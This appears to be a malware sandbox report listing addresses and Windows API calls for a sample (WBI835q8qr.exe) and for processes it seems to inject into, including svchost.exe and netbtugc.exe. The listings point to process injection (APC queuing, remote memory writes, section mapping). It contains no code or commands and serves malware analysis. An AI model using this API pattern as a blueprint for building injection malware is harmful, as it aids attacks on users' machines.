Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_034B2EE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_034B2E80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_034B2D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_034B2D30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_034B2DD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_034B2DF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2C60 NtCreateKey,LdrInitializeThunk,	4_2_034B2C60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_034B2C70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_034B2CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B35C0 NtCreateMutant,LdrInitializeThunk,	4_2_034B35C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B39B0 NtGetContextThread,LdrInitializeThunk,	4_2_034B39B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2B80 NtQueryInformationFile,	4_2_034B2B80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2AB0 NtWaitForSingleObject,	4_2_034B2AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2F60 NtCreateProcessEx,	4_2_034B2F60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2F90 NtProtectVirtualMemory,	4_2_034B2F90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2FA0 NtQuerySection,	4_2_034B2FA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2E30 NtWriteVirtualMemory,	4_2_034B2E30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2EA0 NtAdjustPrivilegesToken,	4_2_034B2EA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2D00 NtSetInformationFile,	4_2_034B2D00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2DB0 NtEnumerateKey,	4_2_034B2DB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2C00 NtQueryInformationProcess,	4_2_034B2C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2CC0 NtQueryVirtualMemory,	4_2_034B2CC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2CF0 NtOpenProcess,	4_2_034B2CF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B3010 NtOpenDirectoryObject,	4_2_034B3010
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B3090 NtSetValueKey,	4_2_034B3090
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B3D70 NtOpenThread,	4_2_034B3D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B3D10 NtOpenProcessToken,	4_2_034B3D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CC7920 NtCreateFile,	4_2_00CC7920
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CC7A70 NtReadFile,	4_2_00CC7A70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CC7BE0 NtClose,	4_2_00CC7BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CC7B50 NtDeleteFile,	4_2_00CC7B50
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CC7D30 NtAllocateVirtualMemory,	4_2_00CC7D30

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B8A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00B8A1EF

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B78310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00B78310

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00B851BD

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B2E6A0	0_2_00B2E6A0
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B4D975	0_2_00B4D975
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B421C5	0_2_00B421C5
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B562D2	0_2_00B562D2
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00BA03DA	0_2_00BA03DA
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B5242E	0_2_00B5242E
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B425FA	0_2_00B425FA
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B366E1	0_2_00B366E1
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B7E616	0_2_00B7E616
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B5878F	0_2_00B5878F
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B88889	0_2_00B88889
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B38808	0_2_00B38808
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00BA0857	0_2_00BA0857
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B56844	0_2_00B56844
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B4CB21	0_2_00B4CB21
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B56DB6	0_2_00B56DB6
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B36F9E	0_2_00B36F9E
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B33030	0_2_00B33030
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B43187	0_2_00B43187
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B4F1D9	0_2_00B4F1D9
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B21287	0_2_00B21287
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B41484	0_2_00B41484
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B35520	0_2_00B35520
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B47696	0_2_00B47696
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B35760	0_2_00B35760
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B41978	0_2_00B41978
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B59AB5	0_2_00B59AB5
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B2FCE0	0_2_00B2FCE0
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B4BDA6	0_2_00B4BDA6
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B41D90	0_2_00B41D90
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00BA7DDB	0_2_00BA7DDB
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B33FE0	0_2_00B33FE0
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B2DF00	0_2_00B2DF00
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00D5FBC0	0_2_00D5FBC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416871	2_2_00416871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416873	2_2_00416873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004028A0	2_2_004028A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410173	2_2_00410173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401110	2_2_00401110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1F3	2_2_0040E1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401290	2_2_00401290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403500	2_2_00403500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040268A	2_2_0040268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402698	2_2_00402698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004026A0	2_2_004026A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF4A	2_2_0040FF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042D753	2_2_0042D753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF53	2_2_0040FF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA352	2_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038003E6	2_2_038003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C02C0	2_2_037C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C8158	2_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038001AA	2_2_038001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730100	2_2_03730100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F81CC	2_2_037F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F41A2	2_2_037F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764750	2_2_03764750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373C7C0	2_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375C6E0	2_2_0375C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03800591	2_2_03800591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F2446	2_2_037F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E4420	2_2_037E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EE4F6	2_2_037EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FAB40	2_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F6BD7	2_2_037F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380A9A6	2_2_0380A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374A840	2_2_0374A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03742840	2_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E8F0	2_2_0376E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037268B8	2_2_037268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4F40	2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760F30	2_2_03760F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E2F30	2_2_037E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03782F28	2_2_03782F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374CFE0	2_2_0374CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732FC8	2_2_03732FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BEFA0	2_2_037BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740E59	2_2_03740E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FEE26	2_2_037FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FEEDB	2_2_037FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752E90	2_2_03752E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FCE93	2_2_037FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DCD1F	2_2_037DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374AD00	2_2_0374AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373ADE0	2_2_0373ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03758DBF	2_2_03758DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740C00	2_2_03740C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730CF2	2_2_03730CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0CB5	2_2_037E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372D34C	2_2_0372D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F132D	2_2_037F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0378739A	2_2_0378739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E12ED	2_2_037E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375B2C0	2_2_0375B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037452A0	2_2_037452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372F172	2_2_0372F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377516C	2_2_0377516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374B1B0	2_2_0374B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380B16B	2_2_0380B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F70E9	2_2_037F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FF0E0	2_2_037FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EF0CC	2_2_037EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037470C0	2_2_037470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FF7B0	2_2_037FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03785630	2_2_03785630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F16CC	2_2_037F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F7571	2_2_037F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DD5B0	2_2_037DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03731460	2_2_03731460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FF43F	2_2_037FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFB76	2_2_037FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B5BF0	2_2_037B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377DBF9	2_2_0377DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375FB80	2_2_0375FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B3A6C	2_2_037B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFA49	2_2_037FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F7A46	2_2_037F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EDAC6	2_2_037EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DDAAC	2_2_037DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03785AA0	2_2_03785AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E1AA3	2_2_037E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03749950	2_2_03749950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375B950	2_2_0375B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D5910	2_2_037D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AD800	2_2_037AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037438E0	2_2_037438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFF09	2_2_037FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFFB1	2_2_037FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03741F92	2_2_03741F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03749EB0	2_2_03749EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F7D73	2_2_037F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F1D5A	2_2_037F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03743D40	2_2_03743D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375FDC0	2_2_0375FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B9C32	2_2_037B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFCF2	2_2_037FFCF2
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_034FB35E	3_2_034FB35E
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_034FB367	3_2_034FB367
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_03518B67	3_2_03518B67
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_034FB587	3_2_034FB587
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_03501C85	3_2_03501C85
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_03501C87	3_2_03501C87
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353A352	4_2_0353A352
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035403E6	4_2_035403E6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0348E3F0	4_2_0348E3F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03520274	4_2_03520274
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035002C0	4_2_035002C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03508158	4_2_03508158
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03470100	4_2_03470100
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0351A118	4_2_0351A118
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035381CC	4_2_035381CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035341A2	4_2_035341A2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035401AA	4_2_035401AA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03512000	4_2_03512000
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034A4750	4_2_034A4750
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03480770	4_2_03480770
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0347C7C0	4_2_0347C7C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0349C6E0	4_2_0349C6E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03480535	4_2_03480535
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03540591	4_2_03540591
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03532446	4_2_03532446
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03524420	4_2_03524420
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0352E4F6	4_2_0352E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353AB40	4_2_0353AB40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03536BD7	4_2_03536BD7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0347EA80	4_2_0347EA80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03496962	4_2_03496962
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034829A0	4_2_034829A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0354A9A6	4_2_0354A9A6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0348A840	4_2_0348A840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03482840	4_2_03482840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034AE8F0	4_2_034AE8F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034668B8	4_2_034668B8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034F4F40	4_2_034F4F40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03522F30	4_2_03522F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034C2F28	4_2_034C2F28
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034A0F30	4_2_034A0F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03472FC8	4_2_03472FC8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0348CFE0	4_2_0348CFE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034FEFA0	4_2_034FEFA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03480E59	4_2_03480E59
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353EE26	4_2_0353EE26
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353EEDB	4_2_0353EEDB
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353CE93	4_2_0353CE93
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03492E90	4_2_03492E90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0348AD00	4_2_0348AD00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0351CD1F	4_2_0351CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0347ADE0	4_2_0347ADE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03498DBF	4_2_03498DBF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03480C00	4_2_03480C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03470CF2	4_2_03470CF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03520CB5	4_2_03520CB5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0346D34C	4_2_0346D34C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353132D	4_2_0353132D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034C739A	4_2_034C739A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0349B2C0	4_2_0349B2C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035212ED	4_2_035212ED
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034852A0	4_2_034852A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B516C	4_2_034B516C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0346F172	4_2_0346F172
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0354B16B	4_2_0354B16B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0348B1B0	4_2_0348B1B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034870C0	4_2_034870C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0352F0CC	4_2_0352F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353F0E0	4_2_0353F0E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035370E9	4_2_035370E9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353F7B0	4_2_0353F7B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034C5630	4_2_034C5630
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035316CC	4_2_035316CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03537571	4_2_03537571
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035495C3	4_2_035495C3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0351D5B0	4_2_0351D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03471460	4_2_03471460
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353F43F	4_2_0353F43F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353FB76	4_2_0353FB76
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034BDBF9	4_2_034BDBF9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034F5BF0	4_2_034F5BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0349FB80	4_2_0349FB80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03537A46	4_2_03537A46
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353FA49	4_2_0353FA49
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034F3A6C	4_2_034F3A6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0352DAC6	4_2_0352DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034C5AA0	4_2_034C5AA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03521AA3	4_2_03521AA3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0351DAAC	4_2_0351DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03489950	4_2_03489950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0349B950	4_2_0349B950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03515910	4_2_03515910
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034ED800	4_2_034ED800
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034838E0	4_2_034838E0
